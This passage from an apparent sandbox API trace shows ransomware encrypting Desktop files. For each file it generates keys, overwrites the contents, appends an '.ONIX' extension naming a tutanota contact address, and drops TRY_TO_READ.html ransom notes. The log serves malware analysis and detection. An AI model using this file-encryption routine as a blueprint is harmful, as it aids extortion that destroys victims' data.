HALPmcxz\\Desktop\\t0hBtW4x qo8SPpZnKfp.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\t0hbtw4x qo8sppznkfp.ods"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a4 [0120.484] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.485] LockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xff0c, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.485] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.485] ReadFile (in: hFile=0x4a4, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.486] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.486] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.486] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0120.486] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0120.486] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\t0hBtW4x qo8SPpZnKfp.ods", dwFileAttributes=0x80) returned 1 [0120.486] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\t0hBtW4x qo8SPpZnKfp.ods") returned 63 [0120.486] GetProcessHeap () returned 0x410000 [0120.486] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xee) returned 0x449878 [0120.486] lstrcpyW (in: lpString1=0x449878, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\t0hBtW4x qo8SPpZnKfp.ods" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\t0hBtW4x qo8SPpZnKfp.ods") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\t0hBtW4x qo8SPpZnKfp.ods" [0120.486] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\t0hBtW4x qo8SPpZnKfp.ods", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\t0hBtW4x qo8SPpZnKfp.ods.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\t0hBtW4x qo8SPpZnKfp.ods.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.486] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=65292) returned 1 [0120.486] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xff0c [0120.486] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.486] GetProcessHeap () returned 0x410000 [0120.486] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8c88 [0120.486] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.487] WriteFile (in: hFile=0x4a4, lpBuffer=0x4d8c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.499] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.500] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.501] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xff0c) returned 0xf50048 [0120.502] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xff0c) returned 0xf5ff60 [0120.502] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.502] ReadFile (in: hFile=0x4a4, lpBuffer=0xf50048, nNumberOfBytesToRead=0xff0c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0xff0c, lpOverlapped=0x0) returned 1 [0120.504] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-65292, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.504] WriteFile (in: hFile=0x4a4, lpBuffer=0xf5ff60*, nNumberOfBytesToWrite=0xff0c, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf5ff60*, lpNumberOfBytesWritten=0x367f44c*=0xff0c, lpOverlapped=0x0) returned 1 [0120.505] UnlockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xff0c, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.505] CloseHandle (hObject=0x4a4) returned 1 [0120.506] GetProcessHeap () returned 0x410000 [0120.506] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8c88 | out: hHeap=0x410000) returned 1 [0120.506] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\t0hBtW4x qo8SPpZnKfp.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\t0hbtw4x qo8sppznkfp.ods"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\t0hBtW4x qo8SPpZnKfp.ods.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\t0hbtw4x qo8sppznkfp.ods.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.509] GetProcessHeap () returned 0x410000 [0120.509] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449878 | out: hHeap=0x410000) returned 1 [0120.509] FindNextFileW (in: hFindFile=0x48edb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32860770, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x32860770, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32860770, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0120.509] FindNextFileW (in: hFindFile=0x48edb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc098f780, ftCreationTime.dwHighDateTime=0x1d5d8dd, ftLastAccessTime.dwLowDateTime=0xad1dca30, ftLastAccessTime.dwHighDateTime=0x1d5dfab, ftLastWriteTime.dwLowDateTime=0xad1dca30, ftLastWriteTime.dwHighDateTime=0x1d5dfab, nFileSizeHigh=0x0, nFileSizeLow=0x19e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UyCkSb.mp3", cAlternateFileName="")) returned 1 [0120.509] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UyCkSb.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\uycksb.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a4 [0120.509] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.509] LockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x19e4, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.509] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.509] ReadFile (in: hFile=0x4a4, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.510] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.510] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.510] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0120.510] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0120.510] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UyCkSb.mp3", dwFileAttributes=0x80) returned 1 [0120.511] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UyCkSb.mp3") returned 49 [0120.511] GetProcessHeap () returned 0x410000 [0120.511] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd2) returned 0x460008 [0120.511] lstrcpyW (in: lpString1=0x460008, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UyCkSb.mp3" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UyCkSb.mp3") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UyCkSb.mp3" [0120.511] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UyCkSb.mp3", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UyCkSb.mp3.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UyCkSb.mp3.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.511] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=6628) returned 1 [0120.511] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x19e4 [0120.511] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.511] GetProcessHeap () returned 0x410000 [0120.511] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8c88 [0120.511] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.513] WriteFile (in: hFile=0x4a4, lpBuffer=0x4d8c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.514] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.515] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.516] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x19e4) returned 0x4dab68 [0120.516] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x19e4) returned 0x4dc558 [0120.516] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.516] ReadFile (in: hFile=0x4a4, lpBuffer=0x4dab68, nNumberOfBytesToRead=0x19e4, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dab68*, lpNumberOfBytesRead=0x367f44c*=0x19e4, lpOverlapped=0x0) returned 1 [0120.517] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-6628, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.517] WriteFile (in: hFile=0x4a4, lpBuffer=0x4dc558*, nNumberOfBytesToWrite=0x19e4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dc558*, lpNumberOfBytesWritten=0x367f44c*=0x19e4, lpOverlapped=0x0) returned 1 [0120.518] UnlockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x19e4, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.518] CloseHandle (hObject=0x4a4) returned 1 [0120.519] GetProcessHeap () returned 0x410000 [0120.519] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8c88 | out: hHeap=0x410000) returned 1 [0120.519] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UyCkSb.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\uycksb.mp3"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UyCkSb.mp3.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\uycksb.mp3.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.521] GetProcessHeap () returned 0x410000 [0120.521] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0120.521] FindNextFileW (in: hFindFile=0x48edb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8217770, ftCreationTime.dwHighDateTime=0x1d5e394, ftLastAccessTime.dwLowDateTime=0xf2e315c0, ftLastAccessTime.dwHighDateTime=0x1d5d92a, ftLastWriteTime.dwLowDateTime=0xf2e315c0, ftLastWriteTime.dwHighDateTime=0x1d5d92a, nFileSizeHigh=0x0, nFileSizeLow=0x13944, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Wg-8wu7kaZU6lp0Ol.xls", cAlternateFileName="WG-8WU~1.XLS")) returned 1 [0120.521] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Wg-8wu7kaZU6lp0Ol.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wg-8wu7kazu6lp0ol.xls"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a4 [0120.521] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.522] LockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x13944, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.522] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.522] ReadFile (in: hFile=0x4a4, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.522] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.522] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.523] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0120.523] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0120.523] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Wg-8wu7kaZU6lp0Ol.xls", dwFileAttributes=0x80) returned 1 [0120.523] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Wg-8wu7kaZU6lp0Ol.xls") returned 60 [0120.523] GetProcessHeap () returned 0x410000 [0120.523] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe8) returned 0x467908 [0120.523] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Wg-8wu7kaZU6lp0Ol.xls" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Wg-8wu7kaZU6lp0Ol.xls") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Wg-8wu7kaZU6lp0Ol.xls" [0120.523] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Wg-8wu7kaZU6lp0Ol.xls", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Wg-8wu7kaZU6lp0Ol.xls.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Wg-8wu7kaZU6lp0Ol.xls.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.523] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=80196) returned 1 [0120.523] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x13944 [0120.523] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.523] GetProcessHeap () returned 0x410000 [0120.523] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8c88 [0120.523] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.524] WriteFile (in: hFile=0x4a4, lpBuffer=0x4d8c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.525] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.526] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.527] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x13944) returned 0xf50048 [0120.528] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x13944) returned 0xf63998 [0120.528] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.528] ReadFile (in: hFile=0x4a4, lpBuffer=0xf50048, nNumberOfBytesToRead=0x13944, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x13944, lpOverlapped=0x0) returned 1 [0120.531] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-80196, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.531] WriteFile (in: hFile=0x4a4, lpBuffer=0xf63998*, nNumberOfBytesToWrite=0x13944, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf63998*, lpNumberOfBytesWritten=0x367f44c*=0x13944, lpOverlapped=0x0) returned 1 [0120.532] UnlockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x13944, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.533] CloseHandle (hObject=0x4a4) returned 1 [0120.533] GetProcessHeap () returned 0x410000 [0120.533] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8c88 | out: hHeap=0x410000) returned 1 [0120.534] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Wg-8wu7kaZU6lp0Ol.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wg-8wu7kazu6lp0ol.xls"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Wg-8wu7kaZU6lp0Ol.xls.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wg-8wu7kazu6lp0ol.xls.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.537] GetProcessHeap () returned 0x410000 [0120.537] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0120.537] FindNextFileW (in: hFindFile=0x48edb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ffa7820, ftCreationTime.dwHighDateTime=0x1d5e6c1, ftLastAccessTime.dwLowDateTime=0x167dd4a0, ftLastAccessTime.dwHighDateTime=0x1d5dc2a, ftLastWriteTime.dwLowDateTime=0x167dd4a0, ftLastWriteTime.dwHighDateTime=0x1d5dc2a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xJ-RJfDr8K", cAlternateFileName="XJ-RJF~1")) returned 1 [0120.537] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xj-rjfdr8k\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a4 [0120.540] FindNextFileW (in: hFindFile=0x48edb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2f7a6e0, ftCreationTime.dwHighDateTime=0x1d5e6a5, ftLastAccessTime.dwLowDateTime=0x23e252c0, ftLastAccessTime.dwHighDateTime=0x1d5e363, ftLastWriteTime.dwLowDateTime=0x23e252c0, ftLastWriteTime.dwHighDateTime=0x1d5e363, nFileSizeHigh=0x0, nFileSizeLow=0x131b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xJErJIJuhjv27y.mkv", cAlternateFileName="XJERJI~1.MKV")) returned 1 [0120.540] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJErJIJuhjv27y.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xjerjijuhjv27y.mkv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a4 [0120.540] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.540] LockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x131b, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.540] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.540] ReadFile (in: hFile=0x4a4, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.542] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.542] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.542] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x473050 | out: pbBuffer=0x473050) returned 1 [0120.542] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0120.542] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJErJIJuhjv27y.mkv", dwFileAttributes=0x80) returned 1 [0120.542] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJErJIJuhjv27y.mkv") returned 57 [0120.542] GetProcessHeap () returned 0x410000 [0120.542] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe2) returned 0x467908 [0120.542] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJErJIJuhjv27y.mkv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJErJIJuhjv27y.mkv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJErJIJuhjv27y.mkv" [0120.543] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJErJIJuhjv27y.mkv", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJErJIJuhjv27y.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX") 